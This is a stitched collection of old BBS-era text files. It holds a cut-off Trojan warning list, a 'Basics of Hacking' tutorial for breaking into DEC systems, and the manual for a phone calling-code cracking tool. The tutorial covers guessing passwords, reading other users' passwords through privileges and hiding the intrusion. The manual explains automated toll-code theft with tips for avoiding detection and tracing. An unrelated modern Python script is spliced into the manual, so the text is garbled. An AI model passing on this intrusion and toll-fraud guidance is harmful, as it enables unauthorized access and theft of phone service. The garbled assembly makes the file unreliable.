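  A raw byte match like this does not see through executable compression,
  the same limitation noted earlier for the PKZip text string that only
  appears after the program has un-PKLited itself.
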
  This Trojan report comes from an article in MacWeek magazine, Volume 7,
  Number 2, issued January 11, 1993.  The article, posted in the FidoNet
  VIRUS_INFO echo by Robert Cummings, states that a program called CPro
  1.41.sea, claiming to be a new version of Compact Pro (a Macintosh
  shareware compression utility), will reformat any floppy in drive 1 and
  tries to reformat the user's start-up hard drive when launched.

  The file can be identified by a 312K sound resource file called "log
  jingle," which is digitized sound from the Ren and Stimpy cartoons.

  Mike Wenthold (1:271/47) found a program under the filename GS2000 which
  contained the VCL 3 [Con] Virus.  I am attempting to get further details
  on what this file is, but until then, here is the archive data that Mike
  sent:

   Length   Method    Size    CF    Date     Time    CRC      Filename
  ======== ======== ======== ==== ========= ====== ======== ============
      1984              1304  34% 22-Dec-91 01:40p 3527B16B GS2000.COM
       543               363  33% 22-Dec-91 01:58p DB83A2C0 GSUNP.DOC
  ======== ======== ======== ==== ========= ====== ======== ============
      2527              1667  34%                           2 files.

  The compression method (on this ZIP archive) was not included in his
  data.

  Frans Hagelaars (2:512/2) has posted a message in several echos
  concerning a Trojan version of the Blue Wave Offline Mail Reader that had
  been circulating in his area.  According to the warning, the "hacked"
  version attacks your hard drive boot sector and partition table, and will
  then "play tricks" with RemoteAccess userlists and phone numbers.

  The filename of this version was not given in the report, nor was it made
  clear whether the BBS door or the Reader was involved.  If you have any
  questions about the security of your copy, remember that you can always
  obtain a safe copy from the BBS of the author, George Hatchew, at FidoNet
  address 1:2240/176, phone number 1-313-743-8464, or from any of the
  official distribution sites (which I believe are listed in the
  documentation for the program).

  Filename  Claimed use/Actual activity/Reporter(s)
  ========  ==============================================================
  AANSI100  Claims to add Auto-ANSI detect to Telegard BBSs - contains
            something called the "Malhavoc Trojan," which displays a verse
            from a Toronto band and attacks files/sectors on drives C:
            through F:.  Reported by HW Todd Clayton and by George Goode
            (1:229/15).

  ANSISCR   VGA BBS ad - contains a self-extracting archive of the Yankee
            Doodle and AntiChrist viruses.  Can trash hard drives as well
            through Trojan behaviour.  Reported by Bill Dirks (1:385/17),
            and under the filename RUNME by Stephen Furness (1:163/273).

  AVENGER   Advertised as an "amazing game that supports all kind of sound
            cards...."  Contains 2 internal password-protected .ZIP format
            files, AVENGER2.DAT and AVENGER3.DAT, which are expanded by
            the program to the files RUNTIME1.COM (N1 virus) and
            RUNTIME2.COM (Anthrax virus).  From Reinhardt Mueller, via
            Bill Lambdin (1:343/45).

  BATMAN    No claim reported - searches your DOS path and tries to "delete
            the executable file that loads WildCat BBSs."  Reported by
            James Powell (Intelec PC-Security Conference), via Bill Lambdin
            (1:343/45).

  CHROME    Possible isolated incident - contains a file, FGDS.COM, which
            contains text that says "Skism Rythem Stack Virus-808."
            Reported by Richard Meyers and forwarded by Larry Dingethal
            (1:273/231).

  DBSOUND   Possible isolated incident - claimed update of the Drum
            Blaster .MOD file player.  Deletes all files in the current
            directory and all of its subdirectories.  From "Khamsin #1
            @9168*1", forwarded by HW Ken Whiton and HW Bill Dennison,
            from Ken Green of the CentraLink BBS.

  GRAFIX    Possible isolated incident - contains the file WAIT.COM, which
            is a renamed copy of DELDIR.COM, a directory remover and file
            deletion tool.  Reported by Andreas Reinicke (2:284/402).

  LOGIM613  Possible isolated incident - one internal file, MOUSE.COM,
            reports as being infected with the VCL virus when checked with
            McAfee's ViruScan v95.  Reported by Mike Wenthold (1:271/47).

  MUVBACK   Claimed keyboard utility - actual ANSI bomb that remaps the D
            key of your keyboard to invoke DEBUG and create a couple of
            Trojans from script files.  Reported by Bill Dirks.

  OPTIBBS   Aimed at RemoteAccess BBS systems - archives your USERS.BBS
            list and places it in your download directory.  Reported by
            HW Nemrod Kedem.

  QOUTES    Not a misspelling - claimed Christmas quotation generator.
            Overwrites the first 128 cylinders of your first HD, requiring
            a low level format to overcome the damage (IDE drives may need
            to go back to the factory).  Reported by Gary Marden
            (2:258/27).

  QSCAN20   Claimed small virus scanner - when run, identifies itself as
            "being a stealth bomber" and attacks your hard drive's FAT.
            Reported by Art Mason (1:229/15).

  RA111TO2  Claims to upgrade RemoteAccess 1.11 to 2.0 - acts similarly to
            the OPTIBBS file reported above.  Repor

The Basics of Hacking, by The Knights of Shadow (DECs)

******************************************************************************
			** BASICS OF HACKING I:  DEC'S **

WELCOME TO BASICS OF HACKING I:  DEC'S. IN THIS ARTICLE YOU WILL LEARN HOW TO
LOG IN TO DEC'S, LOGGING OUT, AND ALL THE FUN STUFF TO DO IN-BETWEEN.  ALL OF
THIS INFORMATION IS BASED ON A STANDARD DEC SYSTEM.  SINCE THERE ARE DEC SYSTEMS
10 AND 20, AND WE FAVOR THE DEC 20, THERE WILL BE MORE INFO ON THEM IN THIS
ARTICLE.  IT JUST SO HAPPENS THAT THE DEC 20 IS ALSO THE MORE COMMON OF THE
TWO, AND IS USED BY MUCH MORE INTERESTING PEOPLE (IF YOU KNOW WHAT WE MEAN...)
OK, THE FIRST THING YOU WANT TO DO WHEN YOU ARE RECEIVING CARRIER FROM A DEC
SYSTEM IS TO FIND OUT THE FORMAT OF LOGIN NAMES.  YOU CAN DO THIS BY LOOKING
AT WHO IS ON THE SYSTEM.  DEC=> @ (THE 'EXEC' LEVEL PROMPT) YOU=> SY SY IS
SHORT FOR SY(STAT) AND SHOWS YOU THE SYSTEM STATUS.  YOU SHOULD SEE THE FORMAT OF
LOGIN NAMES...  A SYSTAT USUALLY COMES UP IN THIS FORM:  JOB LINE PROGRAM USER
JOB:  THE JOB NUMBER (NOT IMPORTANT UNLESS YOU WANT TO LOG THEM OFF LATER)
LINE:  WHAT LINE THEY ARE ON (USED TO TALK TO THEM...) THESE ARE BOTH TWO OR
THREE DIGIT NUMBERS.  PROGRAM:	WHAT PROGRAM ARE THEY RUNNING UNDER?  IF IT
SAYS 'EXEC' THEY AREN'T DOING ANYTHING AT ALL...  USER:  AHHHAHHHH!  THIS IS
THE USER NAME THEY ARE LOGGED IN UNDER...  COPY THE FORMAT, AND HACK YOURSELF OUT
A WORKING CODE...  LOGIN FORMAT IS AS SUCH:  DEC=> @ YOU=> LOGIN USERNAME
PASSWORD USERNAME IS THE USERNAME IN THE FORMAT YOU SAW ABOVE IN THE SYSTAT.
AFTER YOU HIT THE SPACE AFTER YOUR USERNAME, IT WILL STOP ECHOING CHARACTERS
BACK TO YOUR SCREEN.  THIS IS THE PASSWORD YOU ARE TYPING IN...  REMEMBER,
PEOPLE USUALLY USE THEIR NAME, THEIR DOG'S NAME, THE NAME OF A FAVORITE
CHARACTER IN A BOOK, OR SOMETHING LIKE THIS.  A FEW CLEVER PEOPLE HAVE IT SET TO A
KEY CLUSTER (QWERTY OR ASDFG).	PW'S CAN BE FROM 1 TO 8 CHARACTERS LONG,
ANYTHING AFTER THAT IS IGNORED.  YOU ARE FINALLY IN...	IT WOULD BE NICE TO
HAVE A LITTLE HELP, WOULDN'T IT?  JUST TYPE A ?  OR THE WORD HELP, AND IT WILL
GIVE YOU A WHOLE LIST OF TOPICS...  SOME HANDY CHARACTERS FOR YOU TO KNOW
WOULD BE THE CONTROL KEYS, WOULDN'T IT?  BACKSPACE ON A DEC 20 IS RUB WHICH IS
255 ON YOUR ASCII CHART.  ON THE DEC 10 IT IS CNTRL-H.	TO ABORT A LONG
LISTING OR A PROGRAM, CNTRL-C WORKS FINE.  USE CNTRL-O TO STOP LONG OUTPUT TO
THE TERMINAL.  THIS IS HANDY WHEN PLAYING A GAME, BUT YOU DON'T WANT TO
CNTRL-C OUT.  CNTRL-T FOR THE TIME.  CNTRL-U WILL KILL THE WHOLE LINE YOU ARE
TYPING AT THE MOMENT.  YOU MAY ACCIDENTALLY RUN A PROGRAM WHERE THE ONLY WAY OUT
IS A CNTRL-X, SO KEEP THAT IN RESERVE.	CNTRL-S TO STOP LISTING, CNTRL-Q TO
CONTINUE ON BOTH SYSTEMS.  IS YOUR TERMINAL HAVING TROUBLE??  LIKE, IT PAUSES
FOR NO REASON, OR IT DOESN'T BACKSPACE RIGHT?  THIS IS BECAUSE BOTH SYSTEMS
SUPPORT MANY TERMINALS, AND YOU HAVEN'T TOLD IT WHAT YOURS IS YET...  YOU ARE
USING A VT05 (ISN'T THAT FUNNY ?  I THOUGHT I HAD AN APPLE) SO YOU NEED TO TELL
IT YOU ARE ONE.  DEC=> @ YOU=> INFORMATION TERMINAL OR...  YOU=> INFO TER THIS
SHOWS YOU WHAT YOUR TERMINAL IS SET UP AS...  DEC=> ALL SORTS OF SHIT, THEN
THE @ YOU=> SET TER VT05 THIS SETS YOUR TERMINAL TYPE TO VT05.	NOW LET'S SEE
WHAT IS IN THE ACCOUNT (HERE AFTER ABBREVIATED ACCT.) THAT YOU HAVE HACKED
ONTO...  SAY => DIR SHORT FOR DIRECTORY, IT SHOWS YOU WHAT THE USER OF THE CODE
HAS SAVED TO THE DISK.  THERE SHOULD BE A FORMAT LIKE THIS:  XXXXX.OOO XXXXX IS
THE FILE NAME, FROM 1 TO 20 CHARACTERS LONG.  OOO IS THE FILE TYPE, ONE OF:
EXE, TXT, DAT, BAS, CMD AND A FEW OTHERS THAT ARE SYSTEM DEPENDENT.  EXE IS A
COMPILED PROGRAM THAT CAN BE RUN (JUST BY TYPING ITS NAME AT THE @).  TXT IS A
TEXT FILE, WHICH YOU CAN SEE BY TYPING=> TYPE XXXXX.TXT DO NOT TRY TO=> TYPE
XXXXX.EXE THIS IS VERY BAD FOR YOUR TERMINAL AND WILL TELL YOU ABSOLUTELY
NOTHING.  DAT IS DATA THEY HAVE SAVED.	BAS IS A BASIC PROGRAM, YOU CAN HAVE
IT TYPED OUT FOR YOU.  CMD IS A COMMAND TYPE FILE, A LITTLE TOO COMPLICATED TO
GO INTO HERE.  TRY => TAKE XXXXX.CMD BY THE WAY, THERE ARE OTHER USERS OUT
THERE WHO MAY HAVE FILES YOU CAN USE (GEE, WHY ELSE AM I HERE?).  TYPE => DIR
<*.*> (DEC 20) => DIR [*,*] (DEC 10) * IS A WILDCARD, AND WILL ALLOW YOU TO
ACCESS THE FILES ON OTHER ACCOUNTS IF THE USER HAS IT SET FOR PUBLIC ACCESS.
IF IT ISN'T SET FOR PUBLIC ACCESS, THEN YOU WON'T SEE IT.  TO RUN THAT PROGRAM:
DEC=> @ YOU=> USERNAME PROGRAM-NAME USERNAME IS THE DIRECTORY YOU SAW THE FILE
LISTED UNDER, AND FILE NAME WAS WHAT ELSE BUT THE FILE NAME?  ** YOU ARE NOT
ALONE ** REMEMBER, YOU SAID (AT THE VERY START) SY SHORT FOR SYSTAT, AND HOW
WE SAID THIS SHOWED THE OTHER USERS ON THE SYSTEM?  WELL, YOU CAN TALK TO THEM,
OR AT LEAST SEND A MESSAGE TO ANYONE YOU SEE LISTED IN A SYSTAT.  YOU CAN DO
THIS BY:  DEC=> THE USER LIST (FROM YOUR SYSTAT) YOU=> TALK USERNAME (DEC 20)
SEND USERNAME (DEC 10) TALK ALLOWS YOU AND THEM IMMEDIATE TRANSMISSION OF
WHATEVER YOU/THEY TYPE TO BE SENT TO THE OTHER.  SEND ONLY ALLOWS YOU ONE
MESSAGE TO BE SENT, AND ONLY AFTER YOU HIT <RETURN>.  WITH SEND, THEY WILL
SEND BACK TO YOU, WITH TALK YOU CAN JUST KEEP GOING.  BY THE WAY, YOU MAY BE
NOTICING WITH THE TALK COMMAND THAT WHAT YOU TYPE IS STILL ACTED UPON BY THE
PARSER (CONTROL PROGRAM).  TO AVOID THE CONSTANT ERROR MESSAGES TYPE EITHER:
YOU=> ;YOUR MESSAGE YOU=> REM YOUR MESSAGE THE SEMI-COLON TELLS THE PARSER THAT
WHAT FOLLOWS IS JUST A COMMENT.  REM IS SHORT FOR 'REMARK' AND IGNORES YOU
FROM THEN ON UNTIL YOU TYPE A CNTRL-Z OR CNTRL-C, AT WHICH POINT IT PUTS YOU
BACK IN THE EXEC MODE.	TO BREAK THE CONNECTION FROM A TALK COMMAND TYPE:
YOU=> BREAK PRIV'S:  IF YOU HAPPEN TO HAVE PRIVS, YOU CAN DO ALL SORTS OF
THINGS.  FIRST OF ALL, YOU HAVE TO ACTIVATE THOSE PRIVS.  YOU=> ENABLE THIS
GIVES YOU A $ PROMPT, AND ALLOWS YOU TO DO THIS:  WHATEVER YOU CAN DO TO YOUR
OWN DIRECTORY YOU CAN NOW DO TO ANY OTHER DIRECTORY.  TO CREATE A NEW ACCT.
USING YOUR PRIVS, JUST TYPE => BUILD USERNAME IF USERNAME IS OLD, YOU CAN EDIT
IT, IF IT IS NEW, YOU CAN DEFINE IT TO BE WHATEVER YOU WISH.  PRIVACY MEANS
NOTHING TO A USER WITH PRIVS.  BY THE WAY, THERE ARE VARIOUS LEVELS OF PRIVS:
OPERATOR, WHEEL, CIA WHEEL IS THE MOST POWERFUL, BEING THAT HE CAN LOG IN FROM
ANYWHERE AND HAVE HIS POWERS.  OPERATORS HAVE THEIR POWER BECAUSE THEY ARE AT
A SPECIAL TERMINAL ALLOWING THEM THE PRIVS.  CIA IS SHORT FOR 'CONFIDENTIAL
INFORMATION ACCESS', WHICH ALLOWS YOU A LOW LEVEL AMOUNT OF PRIVS.  NOT TO
WORRY THOUGH, SINCE YOU CAN READ THE SYSTEM LOG FILE, WHICH ALSO HAS THE
PASSWORDS TO ALL THE OTHER ACCOUNTS.  TO DE-ACTIVATE YOUR PRIVS, TYPE YOU=>
DISABLE

WHEN YOU HAVE PLAYED YOUR GREEDY HEART OUT, YOU CAN FINALLY LEAVE THE SYSTEM
WITH THE COMMAND=> LOGOUT THIS LOGS THE JOB YOU ARE USING OFF THE SYSTEM
(THERE MAY BE VARIANTS OF THIS SUCH AS KJOB, OR KILLJOB).  BY THE WAY, YOU CAN
SAY (IF YOU HAVE PRIVS) => LOGOUT USERNAME AFL KILLS THE USERNAME'S TERMINAL.

THERE ARE MANY MORE COMMANDS, SO TRY THEM OUT.	JUST REMEMBER:	LEAVE THE
ACCOUNT IN THE SAME STATE AS YOU FOUND IT.  THIS WAY THEY MAY NEVER KNOW THAT
YOU ARE PLAYING LEECH OFF THEIR ACCT.  NEXT TIME:  THE BASICS OF HACKING II:
VAX'S (UNIX)
******************************************************************************
	      THIS ARTICLE WRITTEN BY:	THE KNIGHTS OF SHADOW
******************************************************************************
[END] 1984

Documentation for Fuckin’ Hacker 2.0, by Hypnocosm (June 10, 1987)


                            Fuckin' Hacker 2.0
                            ~~~~~~  ~~~~~~ ~~~

                            A 2AF Presentation

                           Written by: Hypnocosm

                          Released: June 10, 1987

                       "It's just a fuckin' hacker!"

AN OVERVIEW

  Fuckin' Hacker is a code-hacking piece of software. Anyone who does not
know much about phreaking should NOT use this program. It is designed for
the experienced phreak as a tool to aid him in his telephone endeavors, and
to save him a little money in the process.

  Fuckin' Hacker is written to be used with an IBM PC, XT or AT (or clone,
of course) with a Hayes compatible modem. It only supports up to 2400 baud,
but there's no real gain in hacking at speeds higher than 1200, anyway, due
to the lack of higher baud dialups, and the CPU speed limitations.

  Fuckin' Hacker offers a wide range of capabilities. It has multiple dialup
hacking, using multiple targets, and even long distance hacking. (A feature
most other hackers are still lacking). It is not a brute force program, but is
designed instead for the 'paranoid' phreak, living under ESS or worse, who is
in need of codes, yet must obtain them with as little risk as possible.
Hacking multiple dialups, sometimes through a LD service, with random target
numbers is the most risk-free way to hack. It gives LD companies little
indication that any hacking is taking place at all, and reduces your chances
of being 'traced' while in the act. Put it this way, no one I know has ever
been busted for using Fuckin' Hacker ('FH', for short).

  To run FH, be sure the files FH.COM and FH.000 are in the logged drive
(or directory), then simply type 'FH <ret>'. FH will create any files it
needs as it runs, so leave the disk in the drive until you quit FH.

SETTING UP

  When FH first runs it will read in the configuration from disk. If these
files are not present, they will be created. You will then be dropped off
at the Main Menu. The menus in FH are all in the same format. To choose a
menu option, just use the arrow keys and press return when the option you
desire is highlighted. People with color monitors will see the highlighted
options in a different color than the rest of the menu. Monochrome display
users will see the options in two shades, high and low. If these two shades
are not apparent, adjust the level on your monitor until things become clear.

THE MAIN MENU

The options on the Main Menu are:

    Hacker -    Run the hacker. You must have configured the modem and
                extenders before this option will function.

    Scanner -   Yes, FH has a carrier detect scanner, also. It also requires
                some configuration.

    Terminal -  This is a VERY basic terminal routine in case you find the
                need. If you don't like it, use ProComm. This is a hacker,
                not a piece of communications software.

    Utilities - This is the option you will need to use first. It takes you to
                the Utilities Menu where you will spend most of your time with
                FH. This is the meat of the program.

    Quit      - Quit FH and return to DOS.

  As was stated before, to choose an option on the menu, highlight the option
with the arrow keys, and press return (or the space bar). The first thing you
will need to do is configure, so next up:

THE UTILITIES MENU

The options on the Utilities Menu are:

    Configure Modem   - Takes you to the modem configuration.

    Misc Parameters   - Lets you set the default command line parameters,
                        like Begin and End times, printer, I/O windows, etc.

    Edit Extenders    - This is where you design each extender configuration
                        individually.

    Edit Targets      - This is where you store and edit the targets.

    Edit Valids       - This is where the valid codes for use in LD hacking
                        are stored. You can have the hacker automatically
                        append good codes it finds, but they must be updated
                        and checked for validity.

    Extender Flagging - Allows you to flag any combination of extenders to
                        hack.

    Edit Exchanges    - This is where you enter the exchanges you want to
                        scan for computers to hack into.

    Exchange Flagging - Allows you to flag any combination of exchanges to
                        scan.

    Quit to Main Menu - Self explanatory.

                             Setting it Up to Run
                             --------------------

              First step is to go down to the utilities option and hit
         return.  Ok, now you are faced with a new challenge.  The
         Utilities menu.  Well, let's skip over the formalities and move
         on.  Go to the Configure Modem option (you should be on it), and
         hit return.  Ok, this is where you fix up the program to run
         on your system.  The arrow keys on the numeric keypad will flip
         you around on the possible options. If you don't have a numeric
         keypad, well then you have a lousy keyboard, but you can still hit
         the letter corresponding to the option and end up in the right place.
         Hit return or the space bar to edit that option.

         A) ComPort:

             Set the ComPort to 1 or 2 with the arrow keys.

         B) Maximum Baud:

             Set the baud to the maximum baud your modem can handle. This
             baud rate will NEVER be exceeded no matter what some other setting
             is on. (Extenders and targets have their own baud rates... gee.)

         C) Local Dialing:

             This can be set to tone or pulse.  It sets what mode of dialing
             the program will use to dial out of your home dialtone. Everything
             will henceforth be dialed in tone. Just in case your system can't
             handle DTMF...

         D) PBX Dialing:

             This is for those of you calling out from a pbx system.  If you
             are, you simply put 'Yes' for that option and then go down one and
             enter the digit (or digits) that you must hit for an outside line.
             If you are not calling from a pbx then you need not worry about
             the Outgoing Digit.

         E) Outgoing digit:

             This is valid only if the above option is set to 'Yes'. It is the
             numbers dialed locally (in pulse or tone) to get a local phone co
             dialtone. In most cases this will be a '9'.

         F) Initial String:

             This is a 'modem command string' which you define. Be sure it is
             valid if you want the hacker to initialize properly. It is there
             for your commands to the modem just to make using the program a
             little better. I would suggest putting the dialing speed and
             advanced command set (if your modem has them (X6)) in here. An
             example string would be: 'ATX6S11=47' which would set your modem
             to detect busy and voice on the line, and dial with a 47 millisec
             delay. If you can't think of anything useful to put in here, just
             set it to 'AT' so the program will initialize properly.

                * NOTE The program sends TWO initialization strings to the
                  modem. The first sets the response codes to numeric, turns
                  off the echo, etc. The actual command string sent is:

                         ATM0H0E0V0Q0S0=0S7=90

                  If the second string you specify counteracts any of these
                  commands the modem will NOT initialize properly and you
                  could be bothered with a lot of headscratching. Do NOT
                  set the Initial String to 'ATZ' or anything using a command
                  in the above string. Use it for dialing speed, or to turn
                  on advanced response codes (such as voice and busy detect).
                  If you are using a 1200 baud modem, that does not support
                  these extra features but needs a command to let the modem
                  return a CONNECT 1200 you will need to set this string to
                  'ATX1' or something. The first built-in initialization
                  string is not user modifiable. If your modem has trouble with
                  some of the commands in it, you may still get things working
                  the hard way by modifying the COM file itself so that it will
                  have this built-in string set to something your modem is
                  compatible with. I don't suggest doing this if you don't
                  understand exactly how to go about it. And if you DO modify
                  the COM file (hey, it's yours!) PLEASE do not copy it for
                  anyone else. I think you understand why...

         G) Dialing Delay:

             This can either be Time Delay or Dialtone Detect. Dialtone Detect
             is for those of you who have modems that use the advanced command
             set {W,@} (such as USR's).  The Timed Delay is just that. Dialing
             is done with a timer counting off the seconds. I suggest that you
             use Timed Delay even if your modem supports the advanced command
             set, because different modems and different serial ports tend to
             give different results, and it is better to stick with a sure
             deal.

         H) Modem Type:

             You can set this for either External or Internal.  Meaning if you
             have an internal modem you set it to Internal, and vice versa.
             This is there cause it seems that people with internals have major
             problems with all the other programs of this sort.  We fixed that.
             Don't matter where the modem is, in or out, just setting it for
             the correct type will get you on your way. The program will work
             on some internals whether you set it to Internal or not, but it
             will hack more slowly. If the modem has trouble hanging up set
             this option to Internal.

         I) Speaker:

             This just toggles the default for the speaker being on or off.
             The program will run silently with this option set to off.
             Nothing dramatic.

         J) Response codes:

             Finishing off the options is Response Codes.  Response Codes
             brings up its own menu.  There is a list of 12 things.  The first
             11 being the different messages your modem sends to the terminal.
             And the number next to them is the numeric code that the modem
             sends which stands for the message.  Understand? For some reason I
             don't think that is too clear, so let me explain it this way: when
             your modem receives a command string and is able to execute it
             without error, it sends you a numeric code that means "OK".  The
             standard number for "OK" is 0, thus that is what we have the "OK"
             response code set to.  When you get this it will be set to the
             defaults for a USR Courier, which are standard response codes, so
             unless you are using some 6th party modem that you bought from
             the Libyan black market, these should work for you. (But to make
             sure, look up what your response codes are in the owners manual
             for the modem).

                 * NOTE There is no reason to change any of the response codes
                   if your modem simply does not have messages like VOICE or
                   BUSY, etc. Since your modem will not be returning these
                   codes, the program will function normally, never having
                   to deal with the codes being sent. However, you MUST change
                   these numbers if the messages that ARE sent by your modem
                   do not match the codes listed here. For example, if your
                   modem returns an '8' every time it connects at 1200, you
                   will need to set the CONNECT 1200 code to '8' instead of
                   '5'. This is rare, and you will most likely never have
                   to touch this section of the program. Remember, DO NOT
                   change these codes around if the messages your modem DOES
                   return are matched to the right response code. It doesn't
                   MATTER if the VOICE has a response code set for it. If your
                   modem never sends that response code, you will not have to
                   worry about this section at all.

         K) Quit to Utils:

             The 12th command is Quit, it simply brings you back to the
             Utilities menu.  Now go back to the Utilities menu, and we can
             continue with your lesson.
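
The NOTE under F) Initial String says the user-defined string must not counteract the built-in first string. The Python sketch below is an added example, not part of FH or its documentation: it parses both Hayes command lines and reports every command in a proposed Initial String that touches a setting the built-in string already fixed. The function names, and treating &F as a reset alongside the ATZ the manual names, are assumptions of this example.

```python
import re

# First initialization string, quoted from the manual; FH always sends it.
BUILTIN_INIT = "ATM0H0E0V0Q0S0=0S7=90"

# Commands that restore a stored or factory profile and so undo the
# built-in string wholesale. The manual names only ATZ; &F is added here.
RESET_COMMANDS = {"Z", "&F"}

# S-register assignment or query, else a basic or &-prefixed command.
TOKEN = re.compile(r"S(\d+)(?:=(\d*)|\?)|(&?[A-Z])(\d*)")


def parse_at(line):
    """Return [(name, value)] for each setting in a Hayes command line.

    Omitted numeric parameters count as 0 (ATE is ATE0). S-register
    queries (S7?) change nothing and are skipped.
    """
    text = re.sub(r"\s+", "", line.upper())
    if not text.startswith("AT"):
        raise ValueError("command line must begin with AT")
    pos, settings = 2, []
    while pos < len(text):
        if text[pos] == "D":
            # A dial command consumes the rest of the line.
            settings.append(("D", text[pos + 1:]))
            break
        match = TOKEN.match(text, pos)
        if match is None:
            raise ValueError(f"cannot parse {text[pos:]!r}")
        reg, reg_value, cmd, cmd_value = match.groups()
        if reg is not None:
            if reg_value is not None:  # assignment, not a query
                settings.append((f"S{int(reg)}", int(reg_value or 0)))
        else:
            settings.append((cmd, int(cmd_value or 0)))
        pos = match.end()
    return settings


def check_initial_string(user_init, builtin=BUILTIN_INIT):
    """List (command, builtin_value, user_value, verdict) for every command
    in user_init that the manual's rule forbids.

    verdict is "reset" for a profile reset, "override" when the value
    differs from the built-in one, and "repeat" when it is the same.
    """
    fixed = dict(parse_at(builtin))
    findings = []
    for name, value in parse_at(user_init):
        if name in RESET_COMMANDS:
            findings.append((name, None, value, "reset"))
        elif name in fixed:
            verdict = "repeat" if fixed[name] == value else "override"
            findings.append((name, fixed[name], value, verdict))
    return findings


if __name__ == "__main__":
    # The first four candidates are the strings the manual itself mentions;
    # the last one is constructed for this example.
    for candidate in ("ATX6S11=47", "AT", "ATX1", "ATZ", "ATE1V1S7=60"):
        print(candidate, check_initial_string(candidate) or "ok")
```

An empty result means the string only sets things the built-in string leaves alone, which is what the manual asks for.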

                            Miscellaneous Parameters
                            ------------------------

            This section is where you can set the defaults for the Command
         Line Parameters, or change the values of these parameters while
         running the program. The Command Line Parameters make it easy to
         tell the program what to do without having to flip through menus.
         It also makes it very easy to run the program from batch files.
         (I know of a BBS that every few days, early in the morning, quits
         the BBS program to a batch file which looks for a certain errorlevel
         and runs FH using these parameters to set the quit time etc. and then
         returns to the BBS, as if nothing ever happened.) Here are the
         parameters and what they mean. (For info on how to use them from the
         command line, type "FH ?" for the syntax). You need not use any
         command line parameters to set values which are saved as defaults.
         You need only use them if you want something changed from the default
         value you have chosen.

         A) Vacation Dialing:

             This option is used in conjunction with the begin and end
             times for the hacker. When this is enabled, the program will
             hack until the end time, and then wait until the start time
             AGAIN to begin hacking, over and over. Use this if you are
             away for a week or two, and set it to hack, say, between the
             hours 13:00 and 17:00. (Don't hack late at night if you can
             help it, there's less switchboard traffic, and a better chance
             of some operator noticing the bad codes being dialed.)

         B) I/O windows:

             This just turns on or off the scrolling input and output display
             on the top of the hacking and scanning screens. Some people
             think it looks neat, others think it slows things down. But you
             can turn it on or off as you please.

         C) Printer:

             Setting this value to ON will result in all good codes, or
             carriers found with the scanner, being dumped to the printer
             as they are discovered.

         D) Quit to DOS:

             This option tells the hacker or scanner to drop to DOS when the
             end time is reached. This allows a batch file to pick up from the
             DOS prompt and go wherever you want it. No errorlevels are used
             to pass messages to the batch file, but if you can think of
             something you want passed, let me know and I'll put it in.

         E) Start Time:

             This is the time you want to begin hacking, or scanning. It
             will be used for either option. Enter the time in 24hr military
             format.

         F) Quit Time:

             This is the time you want the hacking or scanning to stop. If you
             have the Quit to DOS enabled, the program will exit to DOS when
             this time is reached. Or if Vacation Dialing is enabled, when
             this time is reached, hacking or scanning will cease, and a
             message "Waiting until XX:XX (start time) to begin hacking/
             scanning" will appear.

         G) Quit to Utils:

             Sends you back to the Utilities Menu. You will be asked if you
             want to save the values you have entered here as defaults. If
             you want these values to be the same every time you run the
             program, answer "Y", if however, you liked the defaults you had
             before, and you just want to change something this one time,
             answer "N".

                       Adding/Editing/Deleting Extenders
                       ---------------------------------

              Now what you will want to do is add some of your local dial-
         ups to the Extender file.  So go to the Edit Extender option and
         hit return.  Now you should have a big window in the middle of the
         screen which has all the things you can modify for EACH extender
         in it.  What you want to do is look above that, at the command
         line.  That is your menu of possible commands.  You switch between
         the extender that you can edit by hitting the arrow keys as is
         said on the command line.  If you feel you want to modify one of
         the extenders (that is in the EXTENDER.DAT file that comes in the
         original ARC) or one that you have added ('A'), just hit the arrow
         keys till it says it is on the number you want to edit, and type "E"
         (for edit) to edit it.  You can flip through the different things
         and change them... well, I might as well go over them NOW, so here
         goes.

         A) Area Code:

             This one is simple enough.  Put the area code for the extender
             right here.  Enter this even if the number is local and the area
             code should never be dialed. It won't be. But the information is
             necessary when dialing through valid codes. Understand?

         B) Number:

             Another easy one.  As you might think, this is where the phone
             number to the 'service' you wish to hack goes. This should be 7 digits
             long. If you wish to enter a range of numbers, hit return after
             entering the first number of the range. A dash will then appear
             and you may enter the LAST number in the range. Any number
             within and including these numbers will be hacked. If you do not
             want to enter a range, simply hit return after the dash and all
             will be well.

         C) Dial Mode:

             This one can be set to either Local or Long Distance.  If set to
             Long Distance, it will dial through an extender with a good code
             in VALID.DAT (we will talk about adding good codes to it with the
             Edit Valids option in a little while).  And if it is set to Local
             it will simply dial the extender straight. A good use for Long
             Distance is hacking long distance services and calling some of
             the 950s and PBXs that you don't want to show up in your record.

                   *NOTE:  When hacking 800's it will AUTOMATICALLY
                           add 1800 to the extender while dialing, so you
                           don't need to mess with anything, just set the
                           area code to 800.

         D) Maximum Baud:

             This lets you set the highest baud rate the extender can support.
             This is the highest speed that the extender can handle.  Usually,
             an extender can handle ANY baud, but there are a few exceptions
             (if it is a noisy service, your chances of connecting at 300 are
             better than at 1200 or 2400). Whatever this baud is set to, it
             will never exceed the baud rate in the Modem Configuration.
             This option is linked with E) Minimum Baud.

         E) Minimum Baud:

             This lets you set the lowest baud rate the extender will be
             hacked at. (Targets with baud rate limitations will be taken
             into consideration when matching extenders with targets, so
             do not concern yourself with possible target baud rate
             conflicts.) When dealing with extenders that send 'fake carriers'
             you can set this value to something higher than 300 to overcome
             this problem. This may not always work, but it is usually
             successful.

             This is the digit you must hit in order to get an outside line,
             and it is dialed AFTER the code. The typical Outgoing is 9, but
             it could be anything else, it all depends on the system.

         F) Tone detect:

             This is used in conjunction with the Dialtone Detect in the
             Configure Modem section.  If you have it set to ON in the
             Configure Modem section, then you can use the option here to set
             it on or off for each individual extender, since not every
             extender gives valid dialtones. This option only applies to
             modems which support the dialtone detect feature. ('W').

         G) Answer Delay:

             This is the delay that comes AFTER the extender, and BEFORE the
             code.  It is suggested that you set the speaker on, or listen on
             an extension, and test out the Delay to make sure it is allowing
             enough time for the Extender to answer before it dials the Code
             (if you have option F set to ON, it won't use this delay, it will
             wait for a dialtone before continuing).

         H) Target Delay:

             This is the time that the program will wait for a carrier before
             hanging up the modem and going on to the next try.  This timer
             starts when the target is finished dialing.  Again, you might
             want to turn on the speaker, or listen on an extension, and see
             if this Delay is long enough (meaning the target has time to
             answer before the Delay runs out (of course you will have to set
             option N to a code you know is good, so that you can test the
             Delay)).

         I) Target Prefix:

             This will be dialed before the target, and after the code.  You
             can put commas and W's (for Dialtone Detect) in it.

         J) Code First:

             This one is either Yes or No.  If Yes, then after the
             Extender is dialed, the Code will come before the Target, but
             on the other hand, if it is No, the Target will come before the
             code.

         K) Hack Mode:

